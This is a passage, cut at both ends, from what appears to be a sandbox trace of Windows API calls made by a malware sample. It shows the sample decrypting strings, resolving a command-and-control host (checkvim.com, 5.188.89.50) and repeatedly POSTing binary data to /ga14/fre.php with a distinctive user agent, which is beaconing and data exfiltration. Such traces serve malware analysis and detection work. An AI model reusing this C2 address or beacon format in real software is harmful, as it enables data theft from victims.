(s=0x418, buf=0x873a58*, len=237, flags=0) returned 237 [0274.503] send (s=0x418, buf=0x87eb58*, len=159, flags=0) returned 159 [0274.504] GetProcessHeap () returned 0x840000 [0274.504] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0274.504] recv (in: s=0x418, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0274.870] GetProcessHeap () returned 0x840000 [0274.870] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0274.870] GetProcessHeap () returned 0x840000 [0274.870] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0274.870] GetProcessHeap () returned 0x840000 [0274.870] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0274.870] GetProcessHeap () returned 0x840000 [0274.870] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0274.870] closesocket (s=0x418) returned 0 [0274.870] GetProcessHeap () returned 0x840000 [0274.870] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0274.870] GetProcessHeap () returned 0x840000 [0274.871] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0274.871] GetProcessHeap () returned 0x840000 [0274.871] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0274.871] GetProcessHeap () returned 0x840000 [0274.871] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0274.871] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x558) returned 0x418 [0274.873] Sleep (dwMilliseconds=0xea60) [0274.874] GetProcessHeap () returned 0x840000 [0274.874] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0274.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.876] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0274.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.883] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0274.892] GetProcessHeap () returned 0x840000 [0274.892] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0274.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.894] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0274.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.895] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0274.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.896] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.897] GetProcessHeap () returned 0x840000 [0274.897] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0274.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.898] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0274.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.899] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0274.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.900] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0274.900] GetProcessHeap () returned 0x840000 [0274.900] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0274.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.902] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0274.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.909] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0274.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.910] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0274.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.911] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0274.911] GetProcessHeap () returned 0x840000 [0274.911] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0274.911] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0274.911] GetProcessHeap () returned 0x840000 [0274.912] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0274.912] GetProcessHeap () returned 0x840000 [0274.912] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0274.912] GetProcessHeap () returned 0x840000 [0274.912] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0274.912] GetProcessHeap () returned 0x840000 [0274.912] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0274.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.913] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0274.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.920] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0274.927] GetProcessHeap () returned 0x840000 [0274.927] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0274.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.928] CryptImportKey (in: hProv=0x86f248, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0274.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.930] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0274.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.931] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.931] GetProcessHeap () returned 0x840000 [0274.931] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0274.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.932] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0274.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.933] CryptDestroyKey (hKey=0x87e370) returned 1 [0274.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.935] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0274.935] GetProcessHeap () returned 0x840000 [0274.935] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0274.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.936] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0274.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.937] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0274.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.938] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0274.938] GetProcessHeap () returned 0x840000 [0274.938] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0274.938] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0274.940] GetProcessHeap () returned 0x840000 [0274.940] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0274.940] socket (af=2, type=1, protocol=6) returned 0x41c [0274.940] connect (s=0x41c, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0275.012] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0275.012] GetProcessHeap () returned 0x840000 [0275.012] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0275.012] GetProcessHeap () returned 0x840000 [0275.012] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0275.013] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0275.014] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0275.014] GetProcessHeap () returned 0x840000 [0275.014] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0275.014] GetProcessHeap () returned 0x840000 [0275.014] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0275.014] GetProcessHeap () returned 0x840000 [0275.014] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f830 [0275.014] GetProcessHeap () returned 0x840000 [0275.014] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0275.015] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0275.016] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0275.016] GetProcessHeap () returned 0x840000 [0275.016] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0275.016] GetProcessHeap () returned 0x840000 [0275.016] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0275.016] send (s=0x41c, buf=0x873a58*, len=237, flags=0) returned 237 [0275.017] send (s=0x41c, buf=0x87eb58*, len=159, flags=0) returned 159 [0275.017] GetProcessHeap () returned 0x840000 [0275.017] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0275.017] recv (in: s=0x41c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0275.371] GetProcessHeap () returned 0x840000 [0275.371] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0275.371] GetProcessHeap () returned 0x840000 [0275.371] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0275.372] GetProcessHeap () returned 0x840000 [0275.372] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0275.372] GetProcessHeap () returned 0x840000 [0275.372] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0275.372] closesocket (s=0x41c) returned 0 [0275.372] GetProcessHeap () returned 0x840000 [0275.372] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0275.372] GetProcessHeap () returned 0x840000 [0275.372] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0275.372] GetProcessHeap () returned 0x840000 [0275.373] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0275.373] GetProcessHeap () returned 0x840000 [0275.373] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0275.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x4d8) returned 0x41c [0275.375] Sleep (dwMilliseconds=0xea60) [0275.376] GetProcessHeap () returned 0x840000 [0275.376] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc68 [0275.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.377] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0275.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.398] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fe80) returned 1 [0275.406] GetProcessHeap () returned 0x840000 [0275.406] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0275.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.407] CryptImportKey (in: hProv=0x86fe80, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0275.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.408] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0275.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.412] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.412] GetProcessHeap () returned 0x840000 [0275.412] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0275.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.413] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc68, pdwDataLen=0x19f9a4 | out: pbData=0x87fc68, pdwDataLen=0x19f9a4) returned 1 [0275.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.415] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0275.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.416] CryptReleaseContext (hProv=0x86fe80, dwFlags=0x0) returned 1 [0275.416] GetProcessHeap () returned 0x840000 [0275.416] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0275.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0275.417] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0275.418] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0275.419] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0275.719] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.719] GetProcessHeap () returned 0x840000 [0275.719] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0275.720] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0275.720] GetProcessHeap () returned 0x840000 [0275.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0275.720] GetProcessHeap () returned 0x840000 [0275.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0275.720] GetProcessHeap () returned 0x840000 [0275.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0275.720] GetProcessHeap () returned 0x840000 [0275.720] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0275.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.723] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0275.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.728] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0275.734] GetProcessHeap () returned 0x840000 [0275.734] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0275.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.735] CryptImportKey (in: hProv=0x870128, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0275.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.735] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0275.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.736] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.736] GetProcessHeap () returned 0x840000 [0275.736] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0275.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.737] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0275.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.738] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0275.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0275.739] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0275.739] GetProcessHeap () returned 0x840000 [0275.739] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0275.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0275.740] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0275.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0275.741] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0275.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0275.742] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0275.742] GetProcessHeap () returned 0x840000 [0275.742] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0275.742] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0275.743] GetProcessHeap () returned 0x840000 [0275.743] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0275.743] socket (af=2, type=1, protocol=6) returned 0x420 [0275.743] connect (s=0x420, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0275.823] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0275.823] GetProcessHeap () returned 0x840000 [0275.823] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f8a8 [0275.823] GetProcessHeap () returned 0x840000 [0275.823] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0275.824] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0275.824] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0275.825] GetProcessHeap () returned 0x840000 [0275.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0275.825] GetProcessHeap () returned 0x840000 [0275.825] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0275.825] GetProcessHeap () returned 0x840000 [0275.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fe18 [0275.825] GetProcessHeap () returned 0x840000 [0275.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0275.826] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0275.826] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0275.826] GetProcessHeap () returned 0x840000 [0275.826] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0275.826] GetProcessHeap () returned 0x840000 [0275.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0275.827] send (s=0x420, buf=0x873a58*, len=237, flags=0) returned 237 [0275.827] send (s=0x420, buf=0x87eb58*, len=159, flags=0) returned 159 [0275.827] GetProcessHeap () returned 0x840000 [0275.827] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0275.827] recv (in: s=0x420, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0276.184] GetProcessHeap () returned 0x840000 [0276.184] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0276.184] GetProcessHeap () returned 0x840000 [0276.184] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0276.184] GetProcessHeap () returned 0x840000 [0276.184] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0276.184] GetProcessHeap () returned 0x840000 [0276.184] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f8a8 | out: hHeap=0x840000) returned 1 [0276.184] closesocket (s=0x420) returned 0 [0276.185] GetProcessHeap () returned 0x840000 [0276.185] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0276.185] GetProcessHeap () returned 0x840000 [0276.185] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0276.185] GetProcessHeap () returned 0x840000 [0276.185] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0276.185] GetProcessHeap () returned 0x840000 [0276.185] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0276.186] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, 